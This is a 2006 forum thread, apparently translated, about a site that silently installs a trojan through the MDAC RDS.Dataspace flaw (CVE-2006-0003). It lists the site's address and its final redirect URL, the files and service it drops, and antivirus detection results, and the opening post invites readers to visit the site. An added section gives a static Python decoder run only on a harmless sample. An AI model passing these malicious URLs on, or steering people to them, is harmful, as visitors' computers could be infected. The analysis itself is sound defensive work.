Everyone, please test this website that plants malware





DarkSkyline
2006-11-08, 09:11 AM
頂好影線 (a mainland China site)
http://www.bestmovie.cn/

PS: As soon as the page opens, the site immediately plants malware on your computer. Everyone be careful, and take the chance to test whatever antivirus you have on hand~ :D



KFW
2006-11-08, 09:36 AM
Does it? ....??
Or has your M$ not been updated..?

hycnet
2006-11-08, 09:57 AM
With AntiVir Free edition it is detected as TR/Crypt.NSAnti.Gen

ClamAV found nothing.. Trend Micro apparently didn't either... (hoping Trend Micro steps it up!! :|||: )

Could you share... the characteristics of this malware, or which places to check?

ifchen
2006-11-08, 07:16 PM
Uh...

NOD32 shows no reaction...
And McAfee SiteAdvisor says this is a safe site......



After XP was updated the vulnerability is gone, so nothing happens, I guess~
The situation hcchen describes below won't occur~

rushoun
2006-11-08, 07:25 PM
Since it's a malicious site, isn't it rather dangerous to ask everyone to test it? :confused:

hcchen
2006-11-08, 08:39 PM
The site redirects many times and uses many kinds of encoding.
Final redirect:


http://www.88ttg.com/j.htm


Anyone interested can decode the thing below........




Same as before:
Microsoft Windows MDAC vulnerability - CVE-2006-0003:

A remote code execution vulnerability exists in the RDS.Dataspace ActiveX control, which is provided as part of ActiveX Data Objects (ADO) and distributed with MDAC. An attacker who successfully exploits this vulnerability could take complete control of the affected system. The following is how this vulnerability is used to spread a trojan through a web page

Downloaded files:
1.exe
2.exe
3.exe
df.exe

Created under C:\Documents and Settings\{user}\Local Settings\Temp:
j.exe

After it runs automatically, a message appears that j1.exe and j2.exe have encountered a problem xxxxxxxxxxx

Created under C:\windows:
winntKey.dll 32KB
winnt.Dll 258KB
winnt.exe

Created under C:\windows\system32:
WSD_SOCK32.DLL

Copy and paste stop working

Adds a service:
O23 - Service: PigeonServer - Unknown owner - C:\WINDOWS\winnt.exe (file missing)
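As an added example (not code from the thread, and it never touches the live site), here is a static decoder for the two layers the captured j.htm used: a percent-encoded eval(unescape(...)) loader that defines a routine (named RrRrRrRr in the capture), which rebuilds the page by interleaving the two halves of its string argument. The page it runs on is a constructed sample, and the shuffle() helper exists only to build that sample.

```python
import re
from urllib.parse import quote

# Layer 1: JavaScript unescape(), i.e. %XX and %uXXXX escapes (assumption:
# the loader blob contains nothing else, as in the captured page).
def js_unescape(blob: str) -> str:
    return re.sub(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})",
                  lambda m: chr(int(m.group(1) or m.group(2), 16)), blob)

# Layer 2: the decoded routine minus its document.write(). It emits char i
# of the first half, then char i of the second half, and appends the last
# char when the length is odd (JS: Math.round(l/2), minus 1 for odd l).
def unshuffle(s: str) -> str:
    half = len(s) // 2
    out = "".join(s[i] + s[i + half] for i in range(half))
    return out + s[-1] if len(s) % 2 else out

def shuffle(plain: str) -> str:
    """Inverse of unshuffle(); used here only to build the constructed sample."""
    half, tail = len(plain) // 2, plain[-1] if len(plain) % 2 else ""
    return plain[0::2][:half] + plain[1::2][:half] + tail

# JS string-literal escapes seen in the captured call: \" \\ \r \n \t
_JS_ESC = {"r": "\r", "n": "\n", "t": "\t"}

def js_string(lit: str) -> str:
    return re.sub(r"\\(.)", lambda m: _JS_ESC.get(m.group(1), m.group(1)), lit)

def deobfuscate(html: str) -> dict:
    """Recover both layers statically; nothing from the page is evaluated."""
    m = re.search(r'eval\(unescape\("([^"]*)"\)\)', html)
    loader = js_unescape(m.group(1)) if m else ""
    fn = re.search(r"function\s+(\w+)\s*\(", loader)   # name of the layer-2 routine
    call = fn and re.search(re.escape(fn.group(1)) + r'\("((?:[^"\\]|\\.)*)"\)', html)
    page = unshuffle(js_string(call.group(1))) if call else None
    return {"loader": loader, "page": page}

# Constructed sample: a harmless page wrapped the same way the capture was.
LOADER_SRC = "function RrRrRrRr(teaabb){/* unshuffle, then document.write */};"
PAGE_SRC = '<html><body>\n<p class="demo">constructed sample</p>\n</body></html>'
_LIT = shuffle(PAGE_SRC).replace("\\", "\\\\").replace('"', '\\"').replace("\n", "\\n")
SAMPLE = ('<script>eval(unescape("%s"));</script><script>RrRrRrRr("%s");</script>'
          % (quote(LOADER_SRC, safe=""), _LIT))

if __name__ == "__main__":
    print(deobfuscate(SAMPLE)["page"])
```

Run against a saved copy of a page instead of the sample, the same two regexes pull out the loader and the call, so the HTML can be read without ever letting a browser execute it.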

fq4lxx92
2006-11-08, 11:26 PM
Is being picky good or bad, in the end?

The previous times it used VBScript; this time it has switched to JavaScript, so in theory non-IE browsers should react. But because its JavaScript isn't standard syntax, Firefox just stops there and nothing happens at all.